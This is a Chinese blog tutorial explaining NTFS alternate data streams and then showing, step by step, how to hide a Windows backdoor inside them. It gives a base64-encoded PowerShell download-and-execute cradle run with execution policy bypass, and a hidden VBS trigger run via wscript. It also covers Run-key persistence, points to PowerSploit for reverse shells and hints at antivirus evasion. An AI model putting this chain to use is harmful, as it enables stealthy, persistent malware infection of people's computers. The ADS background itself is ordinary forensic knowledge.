利用ntfs属性隐藏windows后门文件的方法

2021-11-20

本页二维码

热度: 1000000

本文字数: 1.6k 阅读时长: 6 分钟

浅析ADS（供选数据流）隐藏Windows后门的方法

隐藏在windows的后门文件

ADS (供选数据流/ alternate data stream)

NTFS使用Master File Table (MFT) 来管理文件。windows系统中的每个文件都对应一个MFT记录。而每一个MFT记录由若干个属性(attribute)组成，用来描述该文件的具体信息。比如 $FILE_NAME 属性描述了该文件的文件名和创建修改访问时间，而$DATA属性包含了该文件的具体内容。
很多人想当然的认为一个文件只能有一个$DATA属性，这是错误的。在NTFS中，一个文件可以有多个$DATA属性。比如我现在想给test.txt加入一个名为ThisIsAnADS的$DATA属性：

1	c:\test>echo Hello, freebuf! > test.txt:ThisIsAnADS

你可能发现了这两个$DATA属性还是略有不同的，第一个没有名称，而第二个有名称（ThisIsAnADS）！通常人们称第一个为主数据流（primary data stream ）。主数据流在文件创建的同时就被创建了，并且默认没有名称，所以也叫做未名数据流（unnamed data stream）。第二个是我们后来创建的，并且赋予了名称（ThisIsAnADS）。这个就是供选数据流（alternate data stream，ADS）。绝大多数用户只会和主数据流打交道，从某种意义上来说，ADS对用户是隐藏的。用常规的dir命令和windows文件管理器都没法发现ADS。而当我们查看文件内容的时候也仅仅显示主数据流的内容。

c:\test>dir test.txt
Volume in drive C is OS
Volume Serial Number is F467-BAF0
 
Directory of c:\test
 
2015-07-26  10:29                13 test.txt
1 File(s)             13 bytes
0 Dir(s)  42 991 456 256 bytes free
 
c:\test>type test.txt
Hello, world!

看！dir和type命令只显示了主数据流的长度和内容。但是我们可以使用dir /r 命令来列出ADS

c:\test>dir /r test.txt
Volume in drive C is OS
Volume Serial Number is F467-BAF0
 
Directory of c:\test
 
2015-07-26  10:29                13 test.txt
18 test.txt:ThisIsAnADS:$DATA
1 File(s)             13 bytes
0 Dir(s)  42 991 382 528 bytes free

我们也可以用powershell命令Get-Content来查看ADS的内容

1
2
3

PS C:\test> Get-Content test.txt -stream ThisIsAnADS
Hello, freebuf!
PS C:\test>

也许你会问，那ADS到底有什么作用哪？在实际应用中，操作系统和某些应用程序会用ADS来标记和分类文件，比如某些杀毒软件会用ADS来标记哪些文件已经被检查过了（也许我们可以自己设置ADS的内容来避免被查杀？）。IE还会用ADS来标记那些从Internet下载下来的文件。正好我刚下载了一个netcat，查看一下nc.exe

c:\test>dir /r nc.exe
Volume in drive C is OS
Volume Serial Number is F467-BAF0
 
Directory of c:\test
 
2011-09-17  00:52            38 616 nc.exe
26 nc.exe:Zone.Identifier:$DATA
1 File(s)         38 616 bytes
0 Dir(s)  30 734 065 664 bytes free

有一个名为Zone.Identifier的ADS! 查看一下它的内容：

PS C:\test> Get-Content nc.exe -stream Zone.Identifier
[ZoneTransfer]
ZoneId=3
PS C:\test>

ZoneID=3表示这个文件来自Internet Zone。所以每次运行nc.exe，系统知道这个文件来自Internet，然后就会弹出一个警告

用ADS隐藏后门

既然ADS不被大多数用户所知，而且常规的系统命令和文件管理器都检查不到其存在，那么我们可以把后门放在ADS以起到隐藏的目的。让我们先试着把netcat的二进制内容存到test.txt的一个叫nc.exe的ADS里面

c:\test>type nc.exe > test.txt:nc.exe
 
c:\test>dir /r test.txt
Volume in drive C is OS
Volume Serial Number is F467-BAF0
 
Directory of c:\test
 
2015-07-26  11:19                13 test.txt
38 616 test.txt:nc.exe:$DATA
18 test.txt:ThisIsAnADS:$DATA
1 File(s)             13 bytes
0 Dir(s)  42 990 366 720 bytes free

可以写入，没有问题。试着执行之

1 2	c:\test>start test.txt:nc.exe Access is denied.

但是执行不成功。。。因为从windows xp以后微软就禁止用户从ADS里执行程序了。写入，读出操作都可以，但是不允许执行。

换一个思路，既然允许写和读，那么我们可以在ADS里面写入脚本，然后用脚本解释器(Wscript.exe)来运行该脚本。Wscript.exe默认支持js, vbs等，但是我更偏爱powershell的简单高效。所以准备在一个文件中写入2个ADS，一个包含powershell脚本后门，用于从网上下载和执行恶意脚本。一个包含VBS脚本，用于触发powershell脚本。具体设计如下图，包括3部分

恶意脚本：一个提供真正的恶意功能的powershell脚本，比如反弹cmd shell等等，具体如何用powershell实现远控功能，请参照https://github.com/mattifestation/PowerSploit。这里为了演示的目的，我们的”恶意脚本”只会弹出一个对话框，显示”Infected”。该文件名为malware.ps1，存放于 http://127.0.0.1:8123/malware.ps1
下载器：该下载器也是一段powershell脚本，用来下载并执行恶意脚本。其实就一句话 “IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8123/malware.ps1'));” 我们把它base64编码[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(“IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:8123/malware.ps1'));"))得到base64编码结果。然后把 powershell.exe -ep Bypass -noexit -enc [base64编码结果] 写入test.txt:1
触发器：该触发器是一段VB脚本，会开一个cmd运行test.txt:1 里的脚本。由于我们要用wscript.exe 来运行这个ADS, 而wscript.exe会检查脚本文件的后缀名，所以这个ADS的命名必须以.vbs结尾。具体内容为 Dim objShell:Set objShell = WScript.CreateObject(“WScript.Shell”):command = “cmd /C for /f “”delims=,”” %i in (C:\test\test.txt:1) do %i”:objShell.Run command, 0:Set objShell = Nothing，将其写入test.txt:2.vbs

用wscript.exe运行一下，成功！进程管理器显示该进程名为powershell.exe

当然，还可以把wscript.exe test.txt:2.vbs 放在注册表与自动启动相关的键值里，比如HKCU\Software\Microsoft\Windows\CurrentVersion\Run 等，以实现开机自启动。